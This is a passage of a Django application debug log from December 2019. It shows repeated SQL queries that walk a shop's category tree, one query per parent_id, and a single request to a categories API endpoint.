WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:49:01,406 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:49:01,408 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:49:01,410 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:49:01,414 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:49:01,416 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:49:01,418 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:49:01,420 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:49:01,422 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:49:01,426 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:49:01,428 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:49:01,430 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:49:01,432 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:49:01,434 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:49:01,438 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:49:01,440 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:49:01,442 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:49:01,445 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:49:01,447 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:49:01,449 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:49:01,452 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:49:01,454 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:49:01,456 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:49:01,459 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:49:01,462 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:49:01] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:49:31,993 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:49:32,005 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:49:32,011 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:49:32,015 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:49:32,021 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:49:32,025 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:49:32,029 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:49:32,033 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:49:32,037 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:49:32,043 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:49:32,047 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:49:32,051 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:49:32,055 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:49:32,059 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:49:32,065 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:49:32,069 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:49:32,073 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:49:32,077 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:49:32,081 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:49:32,088 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:49:32,092 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:49:32,096 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:49:32,100 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:49:32,104 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:49:32,108 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:49:32,114 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:49:32,118 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:49:32,122 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:49:32,126 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:49:32,130 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:49:32,136 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:49:32,139 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:49:32,143 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:49:32,147 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:49:32,151 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:49:32,158 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:49:32,162 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:49:32,165 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:49:32,170 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:49:32,173 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:49:32,177 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:49:32,182 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:49:32,186 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:49:32,190 utils 4252 140031732287232 (0.001) SELECT 